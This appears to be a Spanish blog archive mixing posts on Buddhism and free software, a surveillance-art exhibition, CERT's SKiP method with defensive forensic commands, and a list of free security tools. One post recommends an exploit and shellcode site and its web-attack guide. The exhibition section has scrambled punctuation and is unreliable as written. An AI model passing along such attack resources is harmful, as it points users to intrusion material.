Thursday, August 16, 2007

10 Analogías entre el Budismo y el Software Libre



En el budismo las cosas no son blancas o negras, no existen el bien o el mal... puede parecer que estas analogías son "el otro lado de la moneda", pero tal lado no existe. Podeis verlo como apología del Software libre.

  • El Budismo, más que una religión es una forma de vida. Ser budista implica actuar de un modo más consciente: O sabes qué estás haciendo o sabes que no tienes ni idea de lo que haces... pero sabes algo.
    El Software Libre, más que un tipo de software, es una forma de vida. Usar S.Libre implica actuar de un modo más consciente: O sabes qué estás haciendo o sabes que no tienes ni idea de lo que haces... pero sabes algo.
  • Cuando eres budista no tienes porqué hacer ver a los demás que el Budismo es mejor o peor. No tiene sentido para tí, pero no puedes evitar contar a todo el mundo tus logros y las facilidades que te aporta en las cosas más pequeñas (y en las más grandes).
    Cuando usas S.Libre no tienes porqué hacer ver a los demás que el S.Libre es mejor o peor. No tiene sentido para tí, pero no puedes evitar contar a todo el mundo tus logros y las facilidades que te aporta en las cosas más pequeñas (y en las más grandes)
  • En el Budismo el dinero no es importante, lo importante es la claridad y progresar poco a poco hacia la perfección.
    En el S.Libre el dinero no es importante, lo importante es la claridad para progresar poco a poco hacia el perfeccionamiento.
  • Cualquiera puede ser budista. No necesitas dinero para túnicas caras, ni raparte la cabeza, ni realizar ninguna acción concreta. El Budismo no es la meta, es el medio para llegar a la meta, es la guía... cada uno debe andar su camino.
    Cualquiera puede usar S.Libre. No necesitas dinero para un ordenador caro, ni ser un geek con gafas, ni realizar ninguna acción concreta. El S.Libre no es la meta, es el medio para llegar a la meta, es la guía... cada uno debe andar su camino.
  • El Budismo no tiene dioses ni líderes. Si el Budismo cambia es debido a las necesidades de los que practican el Budismo. Si el Budismo no cambia es debido a que los que lo practican no necesitan cambiarlo.
    El S.Libre no tiene dueños ni dictadores. Si el S.Libre cambia es debido a las necesidades de los usuarios del S.Libre. Si el S.Libre no cambia es debido a que los que lo utilizan no necesitan cambiarlo.
  • Para el budista tanto valen las opiniones del maestro como las del principiante... la razón no viene atada a ninguna jerarquía, cada cual puede y debe buscar su verdad en el maestro y en el principiante.
    Para el usuario de S.Libre tanto valen las opiniones del maestro (Linus Trovalds, Richard Stallman) como las del principiante (un programador cualquiera)... la razón no viene atada a ninguna jerarquía, cada cual puede y debe buscar su verdad en el maestro y en el principiante.
  • El Budismo invita a la introspección, al conocimiento de los entresijos de tu interior. Con tiempo y práctica, te permite proyectar el conocimiento que tienes sobre tu funcionamiento al funcionamiento de todas las cosas.
    El S.Libre invita a su introspección, al conocimiento de los entresijos de cada línea de código. Con tiempo y práctica, te permite utilizar el conocimiento que tienes sobre su funcionamiento al funcionamiento de todas las cosas.
  • El Budismo nació libre a través de la investigación y la práctica de una persona. Esta persona (Siddhartha Gautama) no se adueñó de sus descubrimientos ni los restringió para que sólo unos pocos pudieran aprovecharlos, los regaló. Los que tomaron el regalo decidieron seguir regalándolo no por obligación, sino por convencimiento propio.
    El S.Libre nació libre a través de la investigación y la práctica de muchas personas. Estas personas no se adueñaron de sus descubrimientos ni los restringieron para que sólo unos pocos pudieran aprovecharlos, los regalaron. Los que tomaron el regalo decidieron seguir regalándolo no por obligación, sino por convencimiento propio.
  • A diferencia de otras religiones, en el budismo los preceptos éticos existen no como imposición sino como guías de práctica. Su importancia es fundamental pero a la vez deben estar sometidos a la indagación personal. Por tanto, a nivel global existe siempre un debate continuo en referencia a cuestiones siempre de actualidad y en donde no hay una postura unilateral. (Este párrafo ha sido fusilado diréctamente de la Wikipedia).
    A diferencia del Software de ciertas empresas, en el S.Libre los preceptos éticos de uso y distribución existen no como imposición sino como guías de práctica. Su importancia es fundamental pero a la vez deben estar sometidos a la indagación personal. Por tanto, a nivel global existe siempre un debate continuo en referencia a cuestiones siempre de actualidad y en donde no hay una postura unilateral.
  • En el Budismo:
    • Puedes meditar y reflexionar sin restricción de ningún tipo.
    • Puedes saber exáctamente qué hay que hacer para meditar/reflexionar y adaptarlo a tus necesidades.
    • Puedes transmitir lo que aprendes.
    • Puedes modificar las formas de meditar/reflexionar y transmitirlas a todo el mundo.
  • El Software Libre es libre sí, y sólo sí:
    • Puedes ejecutar el software.
    • Puedes ver el código fuente y adaptarlo a tus necesidades.
    • Puedes hacer copias y distribuirlas.
    • Puedes ver el código fuente y modificarlo, para luego librerarlo nuevamente a la comunidad.

El último punto puede parecer extraño pero no me lo he inventado (ni ese ni ningún otro), es lo que dice la Free Software Foundation y la traducción la he "tomado prestada" literalmente de este post de topopardo en su blog "Punto y Aparte".

Gracias a los que me han servido de fuente.





Cogido de Mimetist WebLog

Wednesday, April 11, 2007

Interruptores críticos para una sociedad vigilada

( Un proyecto de Fundación Rodríguez ZEMOS98)

Cúmulo de experiencias cotidianas que conforman una suerte de microrresistencias capaces de mantener alerta los mecanismos de defensa


Artista
. Taller de intangibles TAG
http://www.enlloc.org
( ) El Taller de Intangibles TAG es un equipo de trabajo artístico fundado en el año 1996 por Jaume
. . Ferrer y David Gómez Su actividad se centra en las artes digitales y en la red Ha realizado diversas
. intervenciones que han derivado en proyectos en el campo del net art y del arte digital,
. desarrollando igualmente un trabajo teórico en este terreno
. Un espacio de creación, reflexión y difusión del trabajo del taller y de sus propuestas TAG también
dinamiza talleres y seminarios a partir de los cuales propician la colaboración y la cooperación con
. otras persones y colectivos
Pieza
“Apamesnosemapa”
http://sitlocal.wordpress.com
La propuesta de TAG busca ofrecer al visitante una experiencia de desorientación a través de una
. - estructura laberíntica creada con cajas de cartón Por otra lado y a través del visualizador navegador
- . “a pam” desarrollado por el colectivo, se podrá acceder a webs relacionadas con el festival
. Asimismo, el weblog “sit local” sobre “punto de vista local y desorientación” ofrecerá un espacio de
. contacto, reflexión y documentación
Artista
Transnational Temps
http://www.transnationaltemps.net
Transnational Temps nació en Junio de 2001, como fruto de la colaboración en el proyecto de Net
- - ( ) ( ) ( ). Art Novus Extinctus , de los artistas Andy Deck EU , Fred Adam FR y Verónica Perales E En este
momento Transnational Temps fue emblemático de una actitud muy definida hacia la red global de
. comunicaciones
: Devino el nombre de un colectivo de composición variable, bajo un denominador común básico el
respeto a la biosfera como organismo vivo y la utilización de los avances tecnológicos para
. potenciar el conocimiento del entorno natural En HIPNOMEDIA el colectivo cuenta con la
. colaboración del artista Daniel Palacios
Pieza
“Hipnomedia”
... “ los mass media construyen un poderoso atractor, un opulento artefacto por el que se canjea lo
. (...) que acontece en el mundo real A veces se establecen con la electricidad relaciones excluyentes,
... alienantes, adictivas , relaciones que deberían llevarnos a repensar el papel que tienen las
... . tecnologías en la sociedad ”
A través de esta instalación en la que la imagen de cinco monitores es intervenida por la presencia
del espectador, el colectivo pone en escena “el terrible reposo que es también la muerte social, el
control del individuo a través de la inculcación simbólica, la manipulación de la información y la
. acción barbitúrica de los espacios de ocio y entretenimiento”
Artista
Surveillance Camera Players

http://www.notbored.org/the_scp.html
- Bill Brown es el fundador de Surveillance Camera Players, un colectivo de low tech performers
nacido en Nueva York en 1996, que actúa frente a las cámaras de vigilancia e incluso organiza
. walking tours por la ciudad mostrando cámaras y otros dispositivos de vigilancia electrónica
Consideran que el uso de cámaras de vigilancia por parte de la policía es una flagrante violación de
. la cuarta enmienda de la Constitución Americana y se manifiestan en contra de su utilización
Manifiestan su posición realizando performances especialmente relacionadas y adaptadas de obras
. de teatro directamente frente al objetivo de las cámaras Usan su visibilidad – o las entrevistas en los
medios de comunicación o su propio espacio web para echar por tierra el cínico mito que solamente
. aquellos que son “culpables de algo” se oponen a ser vigilados por una mirada desconocida
Pieza
+ “1984” Documentación

Los componentes del SCP realizan sus actuaciones frente a las cámaras de vigilancia aupándose
para hacer sus pantomimas y alzando sus carteles hasta ellas; eso es debido a que las cámaras no
. " graban el sonido Su repertorio es muy amplio e incluso tienen números especiales para lugares
. concretos, como por ejemplo iglesias
En su web se pueden consultar todo tipo de documentos legales y artículos sobre el uso y abuso de
. las cámaras de vigilancia, especialmente agravado tras los hechos del 11 de septiembre de 2001
( …) . Algunos ejemplos de su trabajo video, fotos, carteles constituyen su presencia en la muestra
Artista
& Ricardo Iglesias Gerald Kloger

Ricardo Iglesias, tras sus estudios de filosofía ha trabajado profusamente en el ámbito de la creación
. con medios digitales Imparte clases sobre interfaces y sistemas interactivos en la facultad de Bellas
. Artes de la Universidad de Barcelona Ha trabajado como webmaster para la web del MACA, ha
llevado a cabo proyectos en numerosas muestras nacionales e internacionales y ostenta premios y
. menciones en diferentes concursos y festivales de nuevos medios
Gerald Kogler es técnico de comunicaciones, ha trabajado en los últimos años como programador
( / ) . en Ars Electronica Futurelab Linz Austria y lleva a cabo proyectos de creación multimedia
Pieza
“In the dark”

http://www.mediainterventions.net/inthedark
El objetivo de la instalación es poner de relieve la situación de vigilancia continua a la que estamos
. sometidos desde diferentes medios tecnológicos Esta vigilancia también se expresa en Internet con
diferentes tipos de controles y programas que informan continuamente sobre las actividades de los
. usuarios
( ) Un maniquí sujeto vigilante que dispone de una cámara de video acoplada en uno de sus ojos espía
. y registra en directo las diferentes acciones que suceden en la sala Las imágenes de video son
( ) digitalizadas y manipuladas sobre lenguajes de programación ninguna información es objetiva
. ASCII para posteriormente ser emitidas via Internet En la sala, una proyección permite ver las
. imágenes que se emiten por Internet El espacio vigilado por el maniquí, es vigilado también desde
. la red de redes y en espacios paralelos previamente concertados
Artista
SVEN

http://deprogramming.us/sven
. SVEN es un colectivo formado por Wojciech Kosma y Amy Alexander
Pieza
“Surveillance Video Entertainment Network”
( ) SVEN Surveillance Video Entertainment Network es un sistema compuesto por una cámara
- fotográfica, monitor y dos ordenadores que se puedan instalar en lugares públicos especialmente
. en situaciones en donde un monitor de CCTV está presente
El software consiste en un uso de la visión del ordenador que sigue a peatones desde una furgoneta
y detecta sus características, y un uso del proceso de vídeo en tiempo real que recibe esta
información y la utiliza para generar música y vídeo como representaciones visuales de la cámara
. fotográfica
El vídeo y el audio que resultan se exhiben en un monitor en el espacio público, interrumpiendo el
. tipo estándar exhibición de la cámara fotográfica de seguridad La idea es ironizar y examinar las
preocupaciones por sistemas informáticos de vigilancia, no en términos de ser mirado, sino en
. términos de cómo se está haciendo el mirar
Artista
Michael Klier

Michael Klier nació en Karlovy Vary y actualmente vive en Berlín, donde estudió Filosofía e Historia
- . en Berlín e incluso donde también jugó de manera semi profesional al fútbol Su primer film “Der
. Riese” es un documental sobre videovigilancia con el que ganó numerosos premios interrnacionales
Entonces comenzó a desarrollar una carrera artística en la que se sumaron títulos como “Ueberall ist
( ) ( ) ( ) es besser, wo wir nicht sind” 1989 , “Ostkreuz” 1991 , el documental “Out of America” 1995 ,
( ) ( ) ( ). “Heidi M” 2001 , “Ein Mann boxt sich durch” 2001 y “Farland” 2003
Pieza
( ). . “Der Riese” 1983 81 min

Rodado con cámaras de vigilancia, las distintas grabaciones se van yuxtaponiendo y sugiriendo
. narraciones diversas que se apoyan de manera muy directa en el envoltorio musical
: Como dice Santos Zunzunegui al referirse a esta obra “Der Riese funciona como ese espacio donde
- un ojo impersonal y variable –evacuación de la idea del autor y narrador se limita al registro de una
serie de acontecimientos que a través de su contigüidad –reedición en el área electrónica del efecto
- Kulechov” cinematográfico funcionan como el lugar de generación de una pura apariencia de
. relato ”
Artista
( ) Luis André 1972 Bilbao

- ( - ) ( - )- Dentro de grupos de investigación, Gailu 1997 2004 y Judo Socialware 2000 2007 , trabaja en
el desarrollo y puesta en común de herramientas de ayuda para interpretar los nuevos procesos
sociales derivados de la sociedad de la información, herramientas de software para el análisis de
. vínculos, visualización de relaciones y flujos
Pieza
( - ) - “Kutxabeltza”
1997 1998 Diferentes versiones desde 35 minutos hasta 60 minutos
KUTXA BELTZA Surge en el contexto de la instalación de un centro de control en la ciudad de Bilbao,
en 1997, a través de una red de cámaras, cuyas imágenes están destinadas a su interpretación por
. computadoras para la gestión de tráfico
Donde el espacio público cede su lugar a la imagen pública y donde la realidad perceptiva pasa de
. ser luz y sombras a ser velocidad
El vídeo en un montaje básico de imágenes, realizado exclusivamente con las 30 cámaras que el
ayuntamiento de Bilbao tiene instaladas estratégicamente para el control de tráfico, creando una red
. de dominio de la ciudad
Estos centros de control no se establecen solo con el objeto de proporcionar un dominio visual de la
ciudad, la finalidad de estás instalaciones consiste en dotarse de un instrumento para regular sus
ritmos, imágenes generadas para ejecutar acciones directas sobre los habitantes de la ciudad a
. través de la gestión de los semáforos
Artista
( ) Karmelo Bermejo Málaga,1979

. Karmelo Bermejo vive y trabaja entre Bilbao y Madrid
Pieza
. “Aportación de vigilancia al museo del Prado Vigilar al vigilante de la sala 39”

Las aportaciones son piezas que plagian la realidad y se incorporan a esta añadiendo volumen de
. actividad en su misma dirección Consiste en repetir una actividad que habitualmente se desarrolla
. en la esfera institucional, corporacional o colectiva La acción la repite un sólo individuo,
. otorgándole una autoría y con esta un culpable Después la pieza entra en el mercado del arte,
donde genera un beneficio, igual que hacía la acción matriz de la que parte en el contexto que le era
. propio
“Vigiliar al vigilante implica a priori una actitud antágonica entre vigilante y vigilado, sin embargo se
trata de una contribución a la vigilancia del Museo, dónde además del vigilante que me vigila hay
una cámara de 360º en el techo que también me vigila, el precio de su vigilancia no es el
( mismo que el de la mía, y la mía es la alegal en el Museo del Prado está terminantemente
). prohibido grabar en vídeo y hacer fotos Esta situación se debe, desde luego, al “contexto arte” en
… donde termina todo ”
Artista
La fiambrera obrera

http://www.sindominio.net/fiambrera
Trabaja como colectivo desde 1999 llevando a cabo numerosos proyectos relacionados con el
. espacio público y la acción directa como una de las Bellas Artes
Entre sus trabajos más recientes están la exposición del proyecto Bordergames en el “market” de la
Transmediale, Berlin 2006, así como su participación como artistas invitados por el International
Seminar “Games, Refugees and Democracy” patrocinado por la UNESCO y la Universidad de Bergen
( ) . Noruega y en la programación del “Salon” de la Transmediale, Berlin, ambas en 2007
Pieza
“Especial novios”

En este proyecto “La fiambrera” pone en contacto extranjeros indocumentados y ciudadanos
. europeos atacados de romanticismo conyugante ¿Quieres averiguar cómo se ponen los chicos del
- Misterio del Interior si te casas con un sin papeles?
. : Lo descubrirás en “Mundos Soñados 2” Pero eso no va a ser todo queremos que MS2 sea un número
: lleno de posibilidades de desobediencia civil y sabotaje a la ley de extranjería podrás albergar
- reuniones ilegales, à la Tupperware, en tu casa; transportar sin papeles en tu coche, organizar
... . equipos de fútbol y lo que se te ocurra
Artista
Pripublikarrak

http://pripublikarrak.bitacoras.com
. Pripublikarrak es un juego de palabras de contenido propio Entre lo privado y lo público,
pripublikarrak crea un nuevo espacio de acción, representación y poder donde se cuestiona la
. convencional dicotomía entre la esfera pública y la privada, rompiendo la jerarquía El ser
/ pripublicano pripublicana surge como un mito que se mueve en ese espacio intermedio donde el
. poder deja de tener género
Pripublikarrak es una asociación cultural compuesto por Aiora Kintana Goiriena, Olaia Miranda
( Berasategi, Saioa Olmo Alonso, María Mur Dean y Oihane Ruiz Menéndez tres artistas, una
) productora cultural y una arquitecta , que trabaja cuestiones de género a través de proyectos
. artísticos y comunicativos
Pieza
- . “Shift Control El miedo en la construcción del género”

. Shift y Control Con estos comandos reclamamos un cambio de ese “Panel de Control”; para que en
. vez de ser dirigidas por otros, podamos dirigirnos y construirnos nosotras como sujetos políticos
- . Shift Control trata de analizar el miedo como herramienta de control en la construcción del género
( ) El miedo además de territorializarlo localizarlo en lugares inseguros o problemáticos para la mujer
( …) - en la calle, en la ciudad, en la guerra , queremos des territorializarlo, para entenderlo como
( / ). constructo dentro de las subjetividades del sistema de dominación patriarcal sistema sexo género
- Re dibujar el miedo dentro de un mapa más complejo en tanto que herramienta de control ejercida
/ - . a través de la construcción de identidades inseguras y o in visibilizadas
Para “visualizar hablando” ese arma de control tan intangible y sofisticada como es el miedo, el
- colectivo utilizará la radio como estructura de comunicación no visual, colaborando con radios
- . libres así como con Radio 3 entretejiendo así reflexión con difererentes agentes de Sevilla
Artista
( ) Santiago Ortiz Moebio

. Bogotá, Colombia, 1975
http://moebio.com/santiago
. Artista, matemático e investigador en temas de arte, ciencia y espacios de representación Explora la
. construcción de espacios comunes para conocimientos diversos Asimismo maneja técnicas de
comunicación, creación, expresión, divulgación y representación, en donde se combinan narrativa y
. literatura, espacio digital y espacio arquitectónico y expositivo Se desempaña activamente como
. profesor de seminarios y talleres en España, Portugal y países de Latinoamérica
. Cofundador de la revista de arte y cultura digital “Blank” Parte del equipo de investigación y
. . desarrollo de proyectos de MediaLabMadrid Cofundador de la empresa y colectivo Bestiario
. En moebio com se encuentra información completa acerca de sus exposiciones y el acceso a su obra
. digital
Pieza
“Archivo”

El trabajo de Santiago Ortiz para la exposición “Panel de control” ha consistido en dar visibilidad al
conjunto de referencias, citas y links con las que el equipo de coordinación de la muestra ha venido
. trabajando en estos últimos meses
Referencias que se cruzan, se rozan, se atraviesan y cristalizan finalmente en base a tags y ámbitos
. de correspondencia Mapas conceptuales por los que poder navegar, ofreciendo así la oportunidad
. de conocer el núcleo y el desarrollo del proyecto que es “panel de control”

Saturday, April 07, 2007

Método SKIP

El CERT (Computer Emergency and Response Team) desarrolló una metodología
para el aseguramiento ordenado y sistemático de una red: el Método SKiP (Security
Knowledge in Practice)

Las fases que componen esta metodología son:
1. Seleccionar las aplicaciones y sistemas y configurarlos de acuerdo a las necesidades
de la organización.
2. Reforzar y asegurar los sistemas contra vulnerabilidades conocidas.
3. Preparar una infraestructura de detección y respuesta a incidentes.
4. Detectar intrusiones.
5. Responder a las intrusiones.
6. Mejorar prácticas y procedimientos .
7. Repetir el método SKiP, mientras la organización requiera la protección del sistema y sus activos informáticos.

Herramientas básicas para su estudio:

para la generación de hash
Una implementación libre del algoritmo MD5, tal como la disponible en www.fourmilab.ch/md5/ hará el trabajo. El uso de MD5 es simple. Por ejemplo, para calcular el hash MD5 del intérprete de comandos cmd.exe:

E:\>e:\md5 e:\cmd.exe
84DDF54DB542B2EB9EF08144FB6E3645 e:\cmd.exe


Tiempos de acceso, creación y modificación del sistema de archivos

La obtención del tiempo de último acceso de los archivos de la unidad c: puede hacerse a través del comando dir, el cual es interno al intérprete de comandos (por lo tanto es confiable).

E:\>dir c:\ /s /t:a > a:\tiempo_acceso.txt

La opción /s indica que se incluyan recursivamente los subdirectorios. La opción /t:a indica que se muestren últimos tiempos de acceso, ordenados del más reciente al más antiguo.
Finalmente, los resultados se envían a un archivo en la unidad A:. Con la ayuda de MD5, puede calcularse el hash de los datos recién obtenidos para verificar su integridad en el futuro.

E:\>e:\md5 a:\tiempo_acceso.txt > tiempo_acceso.txt.md5


Los tiempos de modificación y creación pueden obtenerse con los comandos:

E:\>dir c:\ /s /t:w > a:\tiempo_modificacion.txt
E:\>dir c:\ /s /t:c > a:\tiempo_creacion.txt


La opción /t:w indica que se muestren los tiempos de modificación de los archivos,
ordenados del más reciente al más antiguo. La opción /t:c indica indica que se muestren los tiempos de creación de los archivos, ordenados del más reciente al más antiguo
El cálculo de los hashes de los nuevos archivos puede calcularse con los comandos:

E:\>e:\md5 a:\tiempo_modificacion.txt > tiempo_modificacion.txt.md5
E:\>e:\md5 a:\tiempo_creacion.txt > tiempo_creacion.txt.md5



Tabla ARP


La obtención de la tabla ARP, su almacenamiento en disco flexible y el cálculo de su hash MD5, podrían ejecutarse de la siguiente forma:

E:\>e:\arp –a > a:\arp.txt
E:\>e:\md5 a:\arp.txt > a:\arp.txt.md5


Conexiones de red establecidas
Las conexiones de red en curso pueden ser obtenidas utilizando la herramienta netstat.exe.
Adicionalmente, netstat permite obtener los puertos abiertos y los procesos asociados a cada conexión. Esta información podría ser útil para detectar el origen de la actividad del atacante, así como servicios de red no autorizados.


E:\>e:\netstat –a –o –n > a:\netstat.txt


Las opción –a muestra todas las conexiones y puertos abiertos. La opción –o muestra el PID del proceso asociado a cada conexión (sólo disponible en XP y Server 2003).
Finalmente, la opción –n muestra las direcciones IP y los puertos en forma numérica.

Configuración de interfaces de Red

Además de los detalles de configuración vigente para cada interfaz de red, ipconfig mostrará si se ha habilitado IP routing en el sistema, para ser utilizado como gateway.

E:\>e:\ipconfig /all > a:\ipconfig.txt

ipconfig permitirá capturar la información residente en el caché DNS, con
lo cual pueden conocerse algunos de los sitios con los que se ha interactuado recientemente:

E:\>e:\ipconfig /displaydns > a:\ipconfig_dns.txt

Más aquí

Wednesday, April 04, 2007

Guia de Greenpeace sobre Tecnología

La Guía de Greenpeace categoriza las principales empresas de móviles y PCs en sus acciones para eliminar químicos peligrosos, y sus programas de reciclaje. El reporte solo se basa en la información que han hecho público.

La organización Greenpeace reconoce a Lenovo como la empresa número uno en prácticas responsables al medio ambiente.

Este pasado Diciembre, Lenovo comenzó un programa de reciclaje gratis para PCs, portátiles, servers y pantallas así como cualquier portátil de IBM marca ThinkPad, PCs bajo la marca ThinkCentre y monitores ThinkVision in China. Lenovo ofrece programas de reciclaje en cualquier país donde tenga una presencia.

Lenovo también ofrece un reporte de la cantidad que recicla como porcentaje de ventas, aunque la empresa, según Greenpeace, todavía tiene que erradicar de su línea productos con materiales peligrosos. Otras empresas en los cinco mejores son Nokia (segundo) , Sonny Ericsson(tercero), Dell (cuarto) y Samsung(quinto). La peor empresa fue Apple con una puntuación de 2.7, Panasonic y LGE.

Friday, December 15, 2006

Alertas Symantec





Wednesday, November 15, 2006

Fiddle, Guia, Antivirus

Fiddle es un Proxy HTTP que registra todo el tráfico que se produce entre tu ordenador e Internet, permite inspeccionar todo el trafico HTTP, establecer puntos de parada y modificar tanto los datos de entrada como de salida. Fiddle esta diseñado para que su uso sea mucho mas sencillo que trabajar con NetMon o Achilles, se integra con el navegador y incluye soporte mediante scripts para el marcado y edición automáticos de peticiones y respuestas HTTP

Más información y descarga en la siguiente URL: http://www.fiddlertool.com/fiddler/


En http://www.Milw0rm.com, website dedicado por entero a seguridad informática y desde donde se pueden descargar exploits, shellcodes, etc& se ha publicado una guía rápida con ejemplos de cómo funcionan los principales ataques que se utilizan en las intrusiones de aplicaciones Web. SQL Injection, XSS, RFI, WebTrojans, Hijacking,& . Es un manual rápido pero muy interesante.

Lo puedes descargar desde la siguiente URL: http://www.milw0rm.com/papers/111



Con la llegada de Internet Explorer 7 las diferentes casas de antivirus se han puesto las pilas para desarrollar lo que en ciertos ámbitos no se ha dudado en calificar como una autentica revolución en el mundo de los antivirus, En esta nueva generación se prometen soluciones más rápidas, menos pesadas, mas eficaces e incluso, dotados con motores heurísticos basados en redes neuronales.

Podéis ver un avance de uno de estos nuevos sistemas en:
htp://www.youtube.com/watch?v=0Q_hSXqsmTA

Monday, September 18, 2006

Aplicaciones de Seguridad Gratuitas para güin

El objetivo de esta recopilación es ofrecer a los usuarios de plataformas Windows enlaces a aplicaciones libres y/o gratuítas que puedan ser evaluadas y empleadas sin coste alguno por aquellos que lo estimen oportuno.



Este conjunto de herramientas proporcionan al usuario seguridad en distintas facetas que requieren que al menos se tomen unas mínimas medidas de precaución para evitar incidentes indeseables, como la intrusión, la pérdida de información o la contaminación por virus, entre un total de 20 campos de seguridad básicos.


IMPORTANTE: Ninguna de estas aplicaciones ni sus posibles combinaciones ofrece seguridad total a los usuarios. Las recomendaciones hechas sólo están basadas en el factor coste nulo, y nunca en virtud a un análisis exhaustivo de ninguno de los productos, ni de su calidad. El único parámetro considerado ha sido la gratuidad de los programas.



1. Navegación segura



Las mejores opciones actuales son, sin duda, Opera y Firefox, cuyo histórico de vulnerabilidades es muy inferior al de Internet Explorer, navegador que a todas luces no se recomienda. Ambos programas son gratuítos, y en el caso de Firefox, se puede instalar una barra antiphishing que informa de sitios potencialmente fraudulentos. La barra de Netcraft puede ser interesante para proporcionar además de información técnica, protección antiphishing.


Opera


Firefox


Barra Antiphishing para Firefox


Barra de Netcraft


K-Meleon



K-Meleon Nauscópico


2. Correo electrónico seguro


La recomendación natural para gestionar el correo de una manera segura y eficiente es Mozilla Thunderbird. Para complementar la seguridad de las comunicaciones, es aconsejable emplear algún sistema de privacidad como GnuPG, un sustituto libre de PGP, que también tiene una versión gratuíta.


Mozilla Thunderbird


GnuPG


PGP Free


3. Antivirus


Existen muchas aplicaciones antivirus en el mercado. Dentro de los productos que ofrecen versiones gratuítas para empleo doméstico y no comercial, suele hablarse muy bien de Avast!. Como todo buen antivirus, la misión de Avast! es impedir que nos contaminemos por virus y otro malware. Ofrece actualizaciones automáticas, protección residente, y defensa para P2P, mensajería instantánea y Web. Como no podía ser de otro modo, escanea y desinfecta. Otro antivirus decente es AVG Free. AntiVir también tiene una versión gratuíta. Ewido ofrece una suite de seguridad. Hande solicita la incorporación de ClamWin.



Avast! Home


AVG Free Edition


AntiVir Personal Edition


Ewido Security Suite


ClamWin


4. Antimalware


El clásico por excelencia es sin duda, Ad-Aware, que también tiene una edición para uso doméstico y personal gratuíta. Este producto está especialmente indicado para detectar spyware en las máquinas y eliminarlo. Otro producto aconsejable es Spybot Search and Destroy. Spywareguard proporciona bloqueo en tiempo real contra el spyware más usual. Malware Destroyer elimina amenazas de este tipo. Por último, Emsisoft tiene un buen ramillete de aplicaciones antitroyanos y antispyware gratuítas. Añadimos igualmente Windows Defender, a petición de Juan. Hande nos recuerda que existe Winpooch.



Ad-Aware SE Personal


Spybot Search and Destroy


Spywareguard


Malware Destroyer


Herramientas Emsisoft


Windows Defender


Winpooch


5. Firewall


De entre los muchos productos existentes para firewall, vamos a citar a un clásico. Zone Alarm, cuya versión doméstica básica es igualmente gratuíta. El objetivo de un firewall es proporcionar una línea de defensa consistente en la protección contra intrusiones, si bien puede ser empleado además para controlar qué aplicaciones conectan a la Internet en todo momento, pudiendo elegir si permitir o no las comunicaciones de cada programa que tengamos. Además de Zone Alarm, otro firewall gratuíto popular es Kerio, de Sunbelt. maty aconseja incluír Jetico, que también tiene una versión traducida en Nauscopio.




Zone Alarm


Kerio Personal Firewall


Jetico Personal Firewall


Jetico Personal Firewall versión Nauscopio


6. Privacidad


Los programas de limpieza de trazas proporcionan al usuario borrado seguro de las trazas de actividad en un terminal informático. El programa más aconsejable es CCleaner, que proporciona control sobre el borrado de temporales, histórico de navegador, cookies, lista de autocomplete, index.dat para Internet Explorer, borrado de papelera de reciclaje, documentos recientes y un sinfín de información que queda almacenada cuando empleamos un sistema Windows. Contiene herramientas para el borrado de trazas en otras aplicaciones de terceros, como Opera, Media Player, eMule, Kazaa, Google Toolbar, Netscape, MS Office, Nero, Adobe Acrobat, WinRAR, WinAce y WinZip.


Además, contiene un gestor-optimizador del registro, control sobre los programas que el sistema carga al inicio y un desinstalador. Para fines similares, también existe Cleanup!


CCleaner



Cleanup!


7. Almacenamiento seguro de claves


La cantidad de claves que se manejan en el día a día de la navegación hace indispensable emplear un gestor de claves seguro, que permite almacenar las claves que empleamos para así, de un modo seguro, no tener que recordarlas constantemente. En este ámbito es posible recomendar KeePass, así como el conocido Password Safe. También podemos, a petición de maty, hablar de PINs.


KeePass


Password Safe


PINs versión Nautopia


8. Analizadores de tráfico



El objetivo de este tipo de programas es poder controlar el tráfico al que está sometida nuestra red local, como fuente de información de posibles ataques. De entre los muchos programas posibles, recomendar Ethereal es lo más sensato, por su amplia tradición y por sus buenos resultados.


Ethereal


9. Gestión segura de ficheros


La gestión segura para no sólo por el borrado seguro, sino por la conservación segura. Almacenar ficheros sin protección puede ser peligroso, y a la hora de borrar, es recomendable eliminarlos de un modo igualmente seguro, que impida recuperaciones indeseadas. Recomendamos Eraser, Blowfish Advanced CS y Axcrypt.


Borrado seguro con Eraser


Cifrado seguro con Blowfish Advanced CS (sirve también para el borrado seguro)


Cifrado de ficheros con Axcrypt



10. Gestión segura de discos duros


Para gestionar de modo seguro un disco duro debemos contemplar dos tipos de herramientas: borrado seguro de discos completos y cifrado de discos completos. DBAN y Truecrypt pueden servirnos para estos propósitos.


Borrado seguro de discos con Darik´s Boot and Nuke (es una aplicación Linux pero que se ejecuta a modo de live CD)


Cifrado de discos con TrueCrypt


11. Herramientas para comprender los términos de licencia


Los términos de licencia pueden incluír aspectos interesantes sobre la seguridad y la responsabilidad de los productos que usamos. Así por ejemplo, los EULAs (End User License Agreements) contienen información sobre estos aspectos. Eulalyzer selecciona y muestra las partes relevantes de esos acuerdos que nadie suele leer.


Eulalyzer



12. Filtros antispam para el correo electrónico


El spam además de molesto, puede contener malware e intentos de engaño. Lo más aconsejable es filtrar el correo siempre. Mozilla Thunderbird tiene un buen motor antispam integrado, pero es posible instalar motores independientes para un filtrado más intenso. Podemos aconsejar Spambayes y Ella for Spam Control, además de Spampal y Mailwasher.


Spambayes


Ella for Spam Control


Spampal


Mailwasher


13. Sistemas de detección de intrusión


Para evitar las intrusiones no deseadas, existe un buen número de aplicaciones. De carácter gratuíto son Prevx Home y Winpatrol. Añadimos aquí Snort para Windows, por indicación de Juan.



Prevx Home


WinPatrol


Snort W32


14. Protección WiFi


Si bien no hay mecanismos exactos para asegurar las conexiones WiFi, podemos emplear software de apoyo, como por ejemplo Air Defense Personal, orientado a la protección de nuestros Hotspots. Para sondear la disponibilidad de redes, y por tanto, para ver cómo está la nuestra, podemos emplear NetStumbler.


Air Defense Personal


NetStumbler


15. Escáneres de vulnerabilidades


Estos programas enumeran los problemas de seguridad que potencialmente existen en nuestro ordenador. El programa por excelencia es Nessus, si bien para plataformas Windows es aconsejable ejecutar de vez en cuando el Microsoft Security Baseline Analyzer. Para servidores, Windows Server Update Services (véase comentario de josemaria)



Nessus


Microsoft Security Baseline Analyzer


Windows Server Update Services (Gratuíto, pero requiere registro)


16. Escáneres de puertos y de red


Es conveniente saber qué puertos tenemos abiertos, ya que los puertos abiertos son la puerta de entrada a nuestra red para los atacantes. El escáner más popular es Nmap. Para escaneos de la red, LanSpy. Coffee nos recomienda Active Ports.


Nmap



LanSpy


Active Ports


17. Escáneres de vulnerabilidades Web


